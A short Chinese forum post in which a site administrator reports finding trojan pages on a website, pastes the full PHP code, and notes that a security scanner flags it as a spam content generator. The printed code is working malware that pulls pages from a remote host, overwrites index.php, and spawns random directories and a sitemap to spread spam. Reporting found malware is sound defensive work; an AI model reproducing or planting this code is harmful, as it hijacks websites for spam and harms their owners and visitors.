php木马之php垃圾内容生成器
在检测网站时,发现里面有很多木马网页,代码如下:<?php
header("Content-Type: text/html;charset=gb2312");
$Remote_server = "http://www.dzssc005.com";
$directory_Number=5;
$Branch_directory_1=getCode(mt_rand(3,5));
$Branch_directory_2=getCode(mt_rand(3,5));
$Branch_directory_3=getCode(mt_rand(3,5));
$Branch_directory_4=getCode(mt_rand(3,5));
$Branch_directory_5=getCode(mt_rand(3,5));
$Branch_directory_6=getCode(mt_rand(3,5));
$Branch_directory_7=getCode(mt_rand(3,5));
$Branch_directory_8=getCode(mt_rand(3,5));
$Branch_directory_9=getCode(mt_rand(3,5));
$Branch_directory_10=getCode(mt_rand(3,5));
$Branch_directory = $Branch_directory_1.".".$Branch_directory_2.".".$Branch_directory_3.".".$Branch_directory_4.".".$Branch_directory_5.".".$Branch_directory_6.".".$Branch_directory_7.".".$Branch_directory_8.".".$Branch_directory_9.".".$Branch_directory_10;
$NewFile_content = getFileCont("index.php");
if (empty($NewFile_content)) {
exit("<p align='center'><font color='red'><b>Load......</b></font></p>");
}
$ml = $_SERVER['REQUEST_URI'];
$str= explode("/", $ml);
$Quantity = count($str)-1;
$host_name = str_replace("index.php", "", "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']);
if ($Quantity<6 && $Quantity>0) {
$Content_mb=GetHtml($Remote_server."/index.php?type=index.php&host=".$host_name);
if ($Content_mb=="") $Content_mb=GetHtml($Remote_server."/index.php?type=index.php&host=".$host_name);
if (strpos($Content_mb,"tj.js")) {
echo $Content_mb;
$Remote_directory = $Remote_server."/directory.php?type=index.php&host=".$host_name."&directory=".$Branch_directory;
$Content_directory = GetHtml($Remote_directory);
$Branch_directory= explode(".",$Branch_directory);
$sitelinks="<li><a href='".$host_name."index.php'>".$host_name."index.php</a></li>";
for ($i=0;$i < count($Branch_directory); $i++) {
$dirname=$Branch_directory[$i];
$check = CFolder("./".$dirname."/");
if ($check == 1) {
WriteIn("./".$dirname."/index.php",base64_encode($NewFile_content));
$alink="<li><a href='".$host_name.$dirname."/index.php'>".$host_name.$dirname."/index.php</a></li>";
$sitelinks.=$alink;
}
}
$site_mb=GetHtml($Remote_server."/mb/sitemap.html");
$site_mb=str_replace("{links}",$sitelinks,$site_mb);
WriteIn("./sitemap.html",base64_encode($site_mb));
WriteIn("./index.php",base64_encode($Content_mb));
chmod("index.php",0644);
}
//echo "<meta http-equiv='refresh' content='0; url=index.php'>";
exit();
} else {
$Content_mb=GetHtml($Remote_server."/index.php?type=index.php&host=".$host_name);
if ($Content_mb=="") $Content_mb=GetHtml($Remote_server."/index.php?type=index.php&host=".$host_name);
if (strpos($Content_mb,"tj.js")) {
WriteIn("./index.php",base64_encode($Content_mb));
chmod("index.php",0644);
echo $Content_mb;
}
exit();
}
function getCode($iCount) {
$arrChar = "012qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM3456789";
$code="";
for ( $i = 0; $i < $iCount; $i++ )
{
$code .= $arrChar[ mt_rand(0, strlen($arrChar) - 1) ];
}
return $code;
}
function Digital($iCount) {
$arrChar = "0123456789";
$code="";
for ( $i = 0; $i < $iCount; $i++ )
{
$code .= $arrChar[ mt_rand(0, strlen($arrChar) - 1) ];
}
return $code;
}
function sj_int($min, $max) {
return mt_rand($min, $max);
}
function WriteIn($testfile, $msg) {
if (empty($msg)) {
echo "Content null";
return;
}
$msg=base64_decode($msg);
$fp = @fopen($testfile,"w");
fwrite($fp,$msg);
fclose($fp);
}
function getFileCont($testfile) {
$restr = '';
$fp = @fopen($testfile,"r");
if ($fp) {
while($line=fgets($fp,1024)) $restr.=$line;
fclose($fp);
}
return $restr;
}
function CFolder($Filepath) {
if (!file_exists($Filepath)) {
mkdir($Filepath, 0777);
return 1;
}
return 0;
}
function getHTTPPage($url) {
$opts = array(
'http'=>array(
'method'=>"GET",
'header'=>"User-Agent: aQ0O010O"
)
);
$context = stream_context_create($opts);
$html = @file_get_contents($url, false, $context);
if (empty($html)) {
exit("<p align='center'><font color='red'><b>Server Error...</b></font></p>");
}
return $html;
}
function GetHtml($url) {
return getHTTPPage($url);
}
用护卫神云查杀工具扫描后,提示为“垃圾内容生成器-1748”
页:
[1]